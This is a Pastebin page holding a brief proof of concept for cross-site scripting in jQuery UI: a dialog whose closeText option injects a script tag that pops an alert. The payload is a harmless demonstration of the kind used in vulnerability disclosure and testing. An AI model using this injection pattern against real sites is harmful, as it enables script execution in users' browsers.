Advertisement
Guest User

Untitled

a guest
May 22nd, 2019
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.19 KB | None | 0 0
  1. $(document).ready(function () {
  2. $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' });
  3. });
  4.  
  5.  
  6. <div id="dialog" title="Dialog Title">POC OR GTFO!</div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement